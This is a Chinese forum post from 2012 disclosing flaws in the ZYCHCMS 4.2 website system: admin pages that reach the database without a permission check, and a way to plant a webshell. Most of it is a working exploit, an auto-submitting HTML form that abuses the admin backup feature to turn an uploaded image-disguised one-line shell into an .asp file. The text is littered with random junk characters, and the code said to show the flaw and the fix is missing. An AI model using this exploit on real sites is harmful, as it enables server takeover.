0 z) D- q: K3 _8 J& H% B4 J% n0 A" R
: E9 |$ ~4 }9 ~9 T( c
) E. D/ h# M8 P$ K8 Q影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)+ B/ o7 T8 h3 u( w' b6 w+ w; U
①SQL注射漏洞1 j& W0 I4 z7 G4 _0 a) ^! v. Y0 N) H
漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp) [/ }; y$ H+ z/ b
漏洞原因:未过滤
* }$ U6 a' }. s$ t 漏洞代码:
z. D- h1 B! X4 F 都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。5 l) w% m- }( H, X8 j
修复方法:在文件开头加入代码
, g9 i$ @2 I/ P4 a% T# R
8 I& A8 J: f7 S9 N; k+ P$ T* A# k* g6 R% f4 p
②后台拿WBSHELL
. L7 q' d* y0 B2 p 进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。
4 y0 P% H! ~2 q3 M# V 这里在网上找了一个,改了下,将就着用。
+ o: x' o' |( }) S8 N; c1 v: b 以下是代码本地提交代码
+ v0 p9 s1 U _9 w1 u- { ! z/ H: H9 t- |. V4 s" L. H' U* c
/ m. i$ t4 F% |, |<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add> Z; X0 B6 q! ^; ?! C8 `0 s
<!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>( X f' |2 R8 j2 s- W. i7 I2 K
<tr>
! x. y7 v$ R- t" ]1 E <td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>
& V/ I6 r# R$ ]- C- ^ </tr>2 z" T0 W- u0 H, O# e
<tr>
3 o( z& d8 B r" R) Z9 K& D <td bgcolor=”#FFFFFF”><span class=”back_southidc”>
0 v5 b" [0 W r7 m! T* K3 {' R </span>0 L0 ?" Q" b/ {
<table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >
: U% E8 h1 S2 r6 D <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >) k c' I" Z5 a5 h) t/ l( ^
<td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>3 j) w6 f& d+ V) m0 \' y
<td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d
4 T8 j* t; ^ R \8 b <div align=”left”>* L" K, ]6 I* _7 d. w) W
<input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />
1 X( r/ B3 C. M# p <!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>
, |, G' E( X% ^! m$ @0 N <input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />% C, }5 w; f, _! S
</div></td>2 U2 o" I7 \. s5 w' D
</tr>8 b3 s4 z6 C! X" h) y; `
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>) j5 C7 }: _. K. ?( X. |
<td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>( d; s* L$ {9 F! u+ {& J; G
<td class=”td”><div align=”left”>
1 W7 C, J) p( S <input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />- G ?5 @! T& H; H9 W1 g
[如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>
0 |7 `3 f$ I3 s/ G# I/ V </tr>
% b- ]% \* p! A1 i0 M. a# n <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>1 |7 R( N/ v% V+ v$ W+ B
<td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>+ y- D2 f3 V9 X3 h9 Y5 i
<td class=”td”><div align=”left”>2 E; r0 x+ D) D; b! j! c/ B7 k
<input type=”submit” value=”确定备份” class=”btn”; |: q. g% j" S6 g) T
</div></td>
$ s: `7 D* X u2 u </tr>5 a7 v+ w* z, W" k1 A! v# {
</table></td></tr></form>
* N1 F/ B7 |% F4 l0 V </table>8 e; Q; j; G0 _) _: u
</td>
4 C% k; q8 |& C/ A* l/ s) J: J7 N( f </tr>1 l C. _% ]; A
</table>
$ |1 d( S: Q9 }7 c, |& _! z <script>+ x* H3 w& m* s/ z
document.all.add.submit();/ y7 E+ ]# O4 i
</script># F) h% M: d6 y: @
( a9 u% g* N, d# z8 o: |
1 J: M$ E- \" T$ ?7 S: S7 C; y8 U# @ Z
$ ]& s5 |5 _& u, c+ u, o
$ B' q6 n, L# g) _
! ]& A6 j" d( ^: ^5 N) x
: g8 Z9 n; R: B2 @% e& X3 @: \8 e! o, g. ]8 r+ W- a. ^. v
# o% {( m# D$ J# f/ B
' D# ?4 w, r' T1 l/ |4 v! m4 p |
发表于 2012-9-10 21:09:51
收藏
支持
反对